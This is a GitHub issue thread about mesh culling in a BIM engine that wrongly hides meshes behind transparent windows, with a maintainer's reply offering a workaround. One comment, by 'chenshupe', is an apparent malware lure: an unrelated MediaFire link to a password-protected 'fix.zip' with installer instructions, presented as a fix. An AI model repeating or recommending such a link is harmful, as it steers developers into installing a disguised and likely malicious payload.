### ISSUE TITLE
Mesh culling doesn't work with transparent meshes

### ISSUE THREAD

**Issue by GlitchedCode** [ThatOpen/engine_components#489]
### Description 📝

As i'm developing a BIM application that needs to handle very large models (often via streaming) performance is an obvious issue with some models tanking my application's framerate without culling. The problem with culling, though, is working with models that have transparent components (like windows) is problematic: the culler treats a transparent window exactly like an opaque model, and meshes behind it do not get drawn (or loaded in the case of model streaming).

### Additional context ☝️

![2024-08-28T10:32:52,096238490+02:00](https://github.com/user-attachments/assets/0f94307d-89fc-4d55-b9e5-9f4a252a3901)
![2024-08-28T10:33:21,180112869+02:00](https://github.com/user-attachments/assets/8542e008-ecf9-4cca-a53c-03718138321d)

### Validations ✅

- [X] Read the [docs](https://docs.thatopen.com/intro).
- [X] Check that there isn't [already an issue](https://github.com/ThatOpen/engine_components/issues) that requests the same feature to avoid creating a duplicate.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by agviegas** [comment]
@GlitchedCode we are aware of the transparency problem, but unfortunately we are not planning to solve this in the short term, as we are not quite sure about how we should approach it at the moment. 

A possible turnaround would be to load all the transparent meshes as normal fragments, and then use the streamer for the non-opaque meshes. I know this is messy, but if anyone has any ideas to solve this easily (inside or outside the library), they will be welcome!
